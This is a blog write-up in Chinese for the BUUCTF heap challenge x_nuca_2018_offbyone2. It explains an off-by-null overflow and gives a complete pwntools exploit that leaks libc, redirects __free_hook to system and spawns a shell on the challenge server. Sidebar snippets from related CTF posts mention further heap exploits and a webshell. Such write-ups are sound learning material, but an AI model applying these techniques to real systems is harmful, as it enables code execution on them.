BUUCTF:【x_nuca_2018_offbyone2】(off by null)

最新推荐文章于 2023-03-31 10:22:14 发布
最新推荐文章于 2023-03-31 10:22:14 发布
阅读量1.2k 收藏 1
点赞数 1
分类专栏: buuctf刷题 文章标签: 安全 pwn linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51055545/article/details/122343432
版权

在buu里挑了一道heap的题,是一道off by null 的题,比较容易,经典一些

例行检查:

程序为64位,且保护机制全开。

漏洞分析:

add()函数输入内容时,会在输入后多添加一个'\x00'字节,导致溢出一个'\x00'字节。

我们可以利用此漏洞来构造overlap,进而进行攻击。

利用思路和分析:

1.首先利用off by null 构造overlap,泄露libc地址

2.劫持free为system,free掉堆块中含有'/bin/sh'字符串时get shell

先进行堆块布局,通过bby null 漏洞去修改pre_inuse位为0,free后引起向上合并。

add(0x420,'AAAA')#释放后能进入unsortedbin中
add(0x88,'AAAA')
add(0xf8,'AAAA')

for i in range(7):        
	add(0xf0,'A')

for i in range(7):       //将0x100的tcachebin填满,导致再次free后申请的0xf0的堆块能向上合并
	free(i+3)

free(0)
free(1)
add(0x88,'A'*0x80 + p64(0x4c0))#再次将1号申请出来,利用 by null 改掉pre_inuse位,
free(2)#释放掉后引发向上合并
add(0x420,'A')#在把0号堆块申请出来,残留main_arena指针
show(0)

改掉pre_inuse前的堆:

改掉后:

 通过溢出改掉了pre_inuse位,free掉蓝色堆块后,就会形成overlap。

残留指针,通过show(),得到libc地址。

再次进行布局,劫持指针到free_hook,在将free_hook改成system,即可

add(0x180,'AA')

add(0x420,'B')#3    //再次构造堆块重叠,有大佬应该有更简单的方法,这里我感觉这几步有点麻烦了
add(0x88,'B')#4
add(0x1f8,'B')#5    //大家可以申请0x4f8的堆块,之后应该会省去下边的for循环

for i in range(7):   //和上一个循环目的一样,为了填满0x200的tcachesbin
	add(0x1f0,'AA')

for i in range(7):
	free(i+6)

free(3)
free(4)

add(0x88,'A'*0x80 + p64(0x4c0))
free(5)       //引发向上合并
free(3)
add(0x4b0,'A'*0x420 + p64(0) + p64(0x90) + p64(free_hook))  //劫持到free_hook指针

add(0x80,'/bin/sh\x00')   //此处可以将'/bin/sh'写入任意堆块中
add(0x80,p64(system))

free(4)

 此处可以看到,free_hook已经被改成了system,在次free会调用system,从而get shell.

完整exp:

from pwn import *
context.log_level='debug'
io = remote('node4.buuoj.cn',27238)
elf=ELF('./X-nuca_2018_offbyone2')
libc=ELF('./libc-2.27.so')

def choice(c):
	io.recvuntil(">>")
	io.sendline(str(c))

def add(size,content):
	choice(1)
	io.recvuntil(":")
	io.sendline(str(size))
	io.recvuntil(":")
	io.sendline(content)

def free(index):
	choice(2)
	io.recvuntil(":")
	io.sendline(str(index))

def show(index):
	choice(3)
	io.recvuntil(":")
	io.sendline(str(index))


add(0x420,'AAAA')
add(0x88,'AAAA')
add(0xf8,'AAAA')

for i in range(7):
	add(0xf0,'A')

for i in range(7):
	free(i+3)

free(0)
free(1)

add(0x88,'A'*0x80 + p64(0x4c0))
free(2)
add(0x420,'A')
show(0)

leak = u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libc_base = leak - 0x3ebca0
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
success(hex(free_hook))
success(hex(leak))
success(hex(libc_base))
success(hex(system))

add(0x180,'AA')

add(0x420,'B')#3
add(0x88,'B')#4
add(0x1f8,'B')#5

for i in range(7):
	add(0x1f0,'AA')

for i in range(7):
	free(i+6)

free(3)
free(4)

add(0x88,'A'*0x80 + p64(0x4c0))
free(5)
free(3)
add(0x4b0,'A'*0x420 + p64(0) + p64(0x90) + p64(free_hook))

add(0x80,'/bin/sh\x00')
add(0x80,p64(system))
gdb.attach(io)
free(4)

io.interactive()

 flag到手!!

Leee333
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
BUUCTF之off by one漏洞
weixin_45441024的博客
05-21 446
BUUCTF npuctf_2020_easyheap 首先分析一下这个程序,PIE关闭,说明可以修改got表 大概看一下程序的执行机制 堆题常见菜单结构 def add(size,content): p.sendlineafter('Your choice :',str(1)) p.sendlineafter('Size of Heap(0x10 or 0x20 only) : ',str(size)) p.sendlineafter('Content:',content) def edit(
X-nuca_2018_offbyone2
doudoudedi
02-11 471
思路 off by null构造堆重叠然这里的堆块个数充足直接打2次第一次leak libc基址 再次布置好堆块然后打free_hook拿到shell exp: from pwn import * #p=process('./X-nuca_2018_offbyone2') p=remote('node3.buuoj.cn',28262) elf=ELF('./X-nuca_2018_offbyo...
x_nuca_2018_offbyone2(off by null,unlink造成doublefree)
m0_51251108的博客
11-19 3190
x_nuca_2018_offbyone2: 在第七页挑了个题目做,好像不是很难 检查一下,got表可写 漏洞分析: 有个off by null 这题还有输出函数,挺好做的 利用思路: 1.利用off by null 造成unlink使指针数组中,由两个指针指向同一块地方 造成doublefree,我们再顺便泄露了libc 2.劫持free_hook为system,释放填有binsh的那个chunk就getshell了 exp: from pwn import * #from LibcSearcher i
off by null 小结
qq_43409582的博客
11-20 3297
off by null 的一点心得 0x00 最近的一个比赛里有道off by null的题目,比较简单,这里写一下这题的wp和off by null的一些利用。 0x01 前置知识 off by null 本质上就是由于长度的检查不严谨导致了一个空字节的溢出造成的,通常我们会用它来构造Heap Overlap或是用来触发unlink。 这些的前提是对于堆块的合并有所了解。 向前合并与向后合并 先说向前合并,这里就不贴源码了。 通俗的说向前合并就是当一个chunk被free时去检查其物理相邻后一个chunk
starctf2018_note(栈上的null off by one)
seaaseesa的博客
07-25 552
starctf2018_note(栈上的null off by one) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,在add函数里的scanf(“%256s”,&s)存在null off by one,其结果是将在栈里的rbp值低1字节覆盖为0。 将栈里rbp的值低1字节覆盖为0后,其结果导致main函数的rbp上移,这样,我们就可以在add里的可控缓冲区里控制main函数里scanf的格式化字符串指针,我们将其修改为%236s的地址,这样就能在main函数里进行栈溢出
2018X-NUCA的unconditional_security题
03-22
2018X-NUCA比赛的密码题,unconditional_security题目的源码
众核处理器cache一致性研究综述_韩立敏1
08-03
在NUCA结构中,每个核心的Cache距离内存的距离不一,这会增加一致性协议的复杂性,因为它需要处理不同核心之间的数据传输延迟。 文章还对传统的目录一致性协议进行了分析和比较,如MSI(Modified、Shared、Invalid...
2016合天全国高校网安联赛专题赛--赛前指导练习题web进阶篇
07-26
2016合天全国高校网安联赛7月赛前指导练习题web进阶篇
XNUCA2020Qualifier:XNUCA2020Qualifier的文章
04-13
2. **使用Jupyter Notebook**:通过Jupyter Notebook编写代码,进行实验和调试,利用其交互性来快速迭代和验证思路。 3. **数据处理**:如果竞赛涉及数据处理,选手可能需要读取、清洗、分析数据,并根据需求进行...
来自La Nuca FM「De La Nuca FM」-crx插件
03-14
De La Nuca FM收音机的正式延伸 - 107.1MHz。 网络客户端DeLaNucaFM-107.1MHz。 蒙多拉州埃斯库恰斯大米西卡大区托多埃尔蒙多城堡酒店www.delanucafm.com 支持语言:español (Latinoamérica)
2018X-NUCA的unconditional_security
qq_39508127的博客
03-22 246
2018X-NUCA的unconditional_security 这是一道关于量子密码的题,本人比较小白官方writeup,并没有看懂,望有大神指点一下。 附件删除文件后缀,在linux里运行即可。 ...
[堆入门off-by-null]asis2016_b00ks
Nashi_Ko的博客
12-02 1280
[BUUCTF] asis2016_b00ks 堆入门off-by-null 刚开始学pwn就听说,堆的题目很魔幻,需要大量的基础知识。在漫长地啃堆基础原理以后,这是我第一次自己研究学习并且完全明白原理的堆题。特地在此做笔记记录。 0x00 逆向分析 一进来就很容易发现,这也是堆题中最为常见的菜单题目。 简单分析一下,打开程序,最先产生交互的函数是sub_B6D。 调用了sub_9F5函数,是作者自己写的read函数,再进去看看。 注意这里的判定:先++buf,然后判断是否达到了最大长度(32字符),
roarctf_2019_easy_pwn[off by one]
、moddemod
07-01 339
溢出一个字节,修改size域 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() def create_note(size, ): p.sendlineafter('choice:', str(1)) p.sendlineafter('size:', str(size)) def write_note(index,...
pwn 堆入门之off by one
清霂的博客
04-18 190
目录Asis CTF 2016 b00ks Asis CTF 2016 b00ks #!/usr/bin/env python2 from pwn import * arch = "amd64" filename = "b00ks" context(os="linux", arch=arch, log_level="debug") content = 0 offset = 0 # elf elf = ELF(filename) menu_addr=0x0000000000000A89 free_got
【pwn学习】堆溢出(四)- off-by-one 漏洞
Morphy_Amo的博客
02-16 1058
off-by-one 漏洞 前置学习 【pwn学习】堆溢出(一) 【pwn学习】堆溢出(二)- First Fit 【pwn学习】堆溢出(三)- Unlink和UAF off-by-one是一种特殊的溢出漏洞,指只溢出一个字节的情况。 造成原因 造成off-by-one的原因常常是因为边界验证不充分。 循环写入时,循环次数设置错误导致多写入了一个字节; 字符串操作有误; strlen 是我们很熟悉的计算 ascii 字符串长度的函数,这个函数在计算字符串长度时是不把结束符 '\x00' 计算
BUUCTF 2018 在线工具
最新发布
yueyi17的博客
03-31 74
代码审计发现escapeshellarg escapeshellcmd 两个函数具体不是很懂但是大概了解的是这两个函数会产生一个漏洞具体可看。PHP escapeshellarg()+escapeshellcmd() 之殇 (seebug.org)这篇文章。然后试着写入一句话木马传参。发现传输成功然后用蚁剑连接。
[XNUCA2018]Warmup(考点:流量包文件提取,RSA共模攻击)
MikeCoke的博客
02-18 605
题目: from Crypto.Util.number import bytes_to_long, getPrime from random import randint from gmpy2 import powmod import sys p = getPrime(1024) q = getPrime(1024) N = p*q Phi = (p-1)*(q-1) with open("flag", 'r') as fr: flag = bytes_to_long(fr.read().strip(
pwn题堆利用的一些姿势 -- free_hook
lifanxin的博客
04-16 4581
free_hook概述初级必备姿势常规搭配姿势按需进阶姿势总结 pwn题堆利用的一些姿势 – malloc_hook 概述   在做堆题的时候,经常会遇到保护全开的情况,其中对利用者影响最大的是PIE保护和Full RELRO,NX保护和栈保护对堆利用来说影响都不大,一般利用也不会往这方面靠。开了PIE保护的话代码段的地址会变,需要泄露代码段基地址才能利用存储在bss段上的堆指针;开了Full RELRO的话,则意味着我们无法修改got表,导致无法修改其它函数got表指向system,进一步获取到shell
HITCON_2018_children_tcache关于off by null
wuyvle的博客
04-05 1126
创建Chunk时,使用了strcpy函数,而这个函数会在将字符串转移后在末尾添加一个x00,因此此处存在一个off-by-null漏洞。 思路 off by null 想到堆重叠(overlapping),和 16 区别主要是申请的 unsorted bin 大小需要大于 0x408 来避免 chunk 放入 tcache 。 溢出修改 inuse 位比较简单,申请使用下一个 chunk prev_size 的堆直接写满就行,就是 prev_size 怎么写需要想一下办法。因为 free chunk 之前.
BUUCTF-PWN刷题记录-14
weixin_44145820的博客
04-29 601
目录sctf_2019_easy_heap(块重叠,double free) sctf_2019_easy_heap(块重叠,double free) 这题原题目好像是在Ubuntu16下的,但是BUU上面是Ubuntu18,所以应该更简单一点 总的来说,这题应该是ciscn_2019_final_3的加强版吧,当然也有更简单的地方 首先,给了我们一块rwx的空间 add函数会给你conten...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leee333

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值